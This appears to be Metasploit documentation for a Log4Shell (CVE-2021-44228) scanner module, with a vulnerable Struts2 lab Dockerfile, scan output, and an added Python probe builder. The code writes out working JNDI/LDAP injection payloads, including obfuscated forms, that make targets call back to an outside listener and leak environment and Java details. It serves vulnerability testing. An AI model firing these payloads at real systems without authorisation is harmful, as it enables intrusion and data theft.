Vulnerable Application
This module scans an HTTP endpoint for the Log4Shell vulnerability (CVE-2021-44228) by injecting a format message that
triggers an LDAP connection back to Metasploit. It is a generic scanner and can only identify instances that are
vulnerable via one of its pre-determined HTTP request injection points, namely HTTP headers and the HTTP request path.
URI paths for common, known-vulnerable applications are included in the data/exploits/CVE-2021-44228/http_uris.txt
data file. Detection depends on the target being able to open an outbound LDAP connection to SRVHOST on the listener
port (389 in the scenarios below); a vulnerable host behind egress filtering will not be reported.
This module has been successfully tested with:
- Apache Solr
- Apache Struts2
- Spring Boot
- VMware vCenter
Verification Steps
- Set up a vulnerable Struts2 instance (see the steps below)
- Start msfconsole
- Do: `use auxiliary/scanner/http/log4shell_scanner`
- Set the `SRVHOST`, `RHOSTS`, `RPORT` and `TARGETURI` options
- For Struts2, set `TARGETURI` to `/struts2-showcase/`
- Do: `run`
- The target should be identified as vulnerable
Apache Struts2 Setup
The following Dockerfile can be used to set up a vulnerable Struts2 instance for testing (Struts 2.5.28 deployed on
Tomcat 9, listening on port 8080).
#
# To build the image:
# docker build . -t struts2:2.5.28
# To run the container:
# docker run --name struts2 --rm -p 8080:8080 struts2:2.5.28
#
ARG version=2.5.28
FROM bitnami/tomcat:9.0
USER root
ENV TOMCAT_PASSWORD password
RUN apt-get update && \
apt-get -y install unzip && \
apt-get clean && \
rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
unzip struts-all.zip && \
cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/
Options
HTTP_METHOD
The HTTP method to use.
HEADERS_FILE
File containing headers to check, one per line. Lines starting with # will be treated as comments.
URIS_FILE
File containing additional URIs to check, one per line. These values will be appended to the TARGETURI option. Lines
starting with # will be treated as comments. Lines may also contain the string ${jndi:uri}, which will be used as the
injection point. This enables query parameters to be included in the request, which are required for certain
applications.
LEAK_PARAMS
Additional parameters to leak, separated by the ^ character. For example, the following would leak the USER and PATH
environment variables: ${env:USER}^${env:PATH}. See the Log4j Lookups wiki page for more information on available
parameters.
LDAP_TIMEOUT
Time in seconds to wait to receive LDAP connections. The listener stays open for this long after the HTTP requests
have been sent; the Solr scenario below shows this wait as "Sleeping 30 seconds for any last LDAP connections".
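The injection-and-callback loop described above and in the Vulnerable Application section, written out as an added
Python example that is not the module's own code: it builds the ${jndi:...} probe with a per-request token and the
${sys:java.vendor}_${sys:java.version} leak that appears in the scenario output below, expands HEADERS_FILE and
URIS_FILE contents (comment lines, the ${jndi:uri} placeholder, appending to TARGETURI) into concrete requests, and
decodes the baseObject DN from the LDAP SearchRequest a vulnerable JNDI client sends back so the token can be matched
to the injection point that fired. The ldap:${::-/}/ spelling for path injections is the form visible in the Struts2
output below; it evaluates to ldap:// once Log4j resolves the nested lookup while keeping a literal // out of the
request path. How the real module lays out LEAK_PARAMS in the URL, injects into a URI line without a placeholder, and
frames its LDAP traffic is not described on this page, so the layouts used here (extra lookups as further path
segments, the payload appended as a trailing path segment), the sample LDAP bytes and all function names are this
example's own assumptions.

```python
import re
import secrets
from urllib.parse import quote

PLACEHOLDER = "${jndi:uri}"               # URIS_FILE marker for an explicit injection point
TOKEN_RE = re.compile(r"^[0-9a-f]{16}$")  # shape of the tokens make_token() produces


def make_token():
    # One random token per request: the callback echoes it, tying a hit to its injection point.
    return secrets.token_hex(8)


def build_payload(srvhost, srvport, token, leak_params=(), path_safe=False):
    # Leaks java.vendor/java.version by default (as in the module output); extra LEAK_PARAMS
    # lookups ride along as further path segments (this example's layout, not the module's).
    # path_safe writes ldap:${::-/}/ so the request path holds no literal '//' yet still
    # evaluates to ldap:// once Log4j resolves the nested lookup.
    scheme = "ldap:${::-/}/" if path_safe else "ldap://"
    segments = [token, "${sys:java.vendor}_${sys:java.version}", *leak_params]
    return "${jndi:" + scheme + f"{srvhost}:{srvport}/" + "/".join(segments) + "}"


def parse_list_file(text):
    # HEADERS_FILE / URIS_FILE rules: one entry per line, blank lines and '#' lines ignored.
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def build_requests(target_uri, uris_text, headers_text, srvhost, srvport, leak_params=()):
    # Expand both lists into probe requests; token_map names each token's injection point.
    requests, token_map = [], {}
    base_segs = [s for s in target_uri.split("/") if s]
    for uri in parse_list_file(uris_text):
        token = make_token()
        # '/' is kept unencoded so the path reads as in the module output; path_safe above
        # keeps the '//' of the URL scheme out of the literal path.
        enc = quote(build_payload(srvhost, srvport, token, leak_params, path_safe=True), safe="/")
        if PLACEHOLDER in uri:   # explicit point, e.g. a query parameter the app requires
            path = "/" + "/".join(base_segs + [uri.lstrip("/").replace(PLACEHOLDER, enc)])
        else:                    # no placeholder: append the payload as a path segment
            path = "/" + "/".join(base_segs + [s for s in uri.split("/") if s] + [enc]) + "/"
        requests.append({"token": token, "method": "GET", "path": path, "headers": {}})
        token_map[token] = "path " + path
    for header in parse_list_file(headers_text):
        token = make_token()
        requests.append({"token": token, "method": "GET", "path": target_uri,
                         "headers": {header: build_payload(srvhost, srvport, token, leak_params)}})
        token_map[token] = "header " + header
    return requests, token_map


def ber(tag, payload):
    # Encode one BER TLV, using the long length form for values of 128 bytes or more.
    n, width = len(payload), (len(payload).bit_length() + 7) // 8
    size = bytes([n]) if n < 0x80 else bytes([0x80 | width]) + n.to_bytes(width, "big")
    return bytes([tag]) + size + payload


def read_tlv(buf, pos=0):
    # Decode one BER TLV (short or long-form length); returns (tag, value, next_pos).
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def search_base_from_ldap(buf):
    # Walk every LDAPMessage in the buffer (the JNDI client sends an anonymous BindRequest
    # first, then the SearchRequest) and return the SearchRequest's baseObject DN, else None.
    pos = 0
    while pos < len(buf):
        tag, body, pos = read_tlv(buf, pos)
        if tag != 0x30:                    # LDAPMessage ::= SEQUENCE { messageID, protocolOp }
            return None
        _, _msg_id, p = read_tlv(body)
        tag, op, _ = read_tlv(body, p)
        if tag == 0x63:                    # [APPLICATION 3] SearchRequest
            tag, base, _ = read_tlv(op)    # first field: baseObject LDAPDN (OCTET STRING)
            return base.decode("utf-8", "replace") if tag == 0x04 else None
    return None


def correlate(base_dn, token_map):
    # The DN arrives as 'token/leaked-values'; map it back to the request that triggered it.
    token, _, leaked = base_dn.lstrip("/").partition("/")
    if not TOKEN_RE.match(token) or token not in token_map:
        return None
    return token_map[token], leaked


def sample_callback(base_dn):
    # Constructed wire bytes standing in for a real callback: anonymous LDAPv3 bind, then a
    # SearchRequest (scope baseObject, derefAliases always, filter (objectClass=*)).
    bind = ber(0x60, ber(0x02, b"\x03") + ber(0x04, b"") + ber(0x80, b""))
    search = ber(0x63, ber(0x04, base_dn.encode()) + ber(0x0A, b"\x00") + ber(0x0A, b"\x03")
                 + ber(0x02, b"\x00") + ber(0x02, b"\x00") + ber(0x01, b"\x00")
                 + ber(0x87, b"objectClass") + ber(0x30, b""))
    return ber(0x30, ber(0x02, b"\x01") + bind) + ber(0x30, ber(0x02, b"\x02") + search)
```

To turn this into a live check, send each request from build_requests with any HTTP client, bind a TCP socket on
SRVHOST:389 (a privileged port, so the listener needs root or CAP_NET_BIND_SERVICE), feed each connection's bytes to
search_base_from_ldap and hand the DN to correlate; a non-None result is the equivalent of the module's "Log4Shell
found via ..." line, with the leaked java.vendor/java.version in the second element. sample_callback exists only so the
decoder can be exercised offline; a real JNDI client produces the same two messages on the wire.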
Scenarios
Apache Struts2
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >
Apache Solr
Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245
[*] Started service listener on 10.9.4.245:389
[+] 10.10.235.209:8983 - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed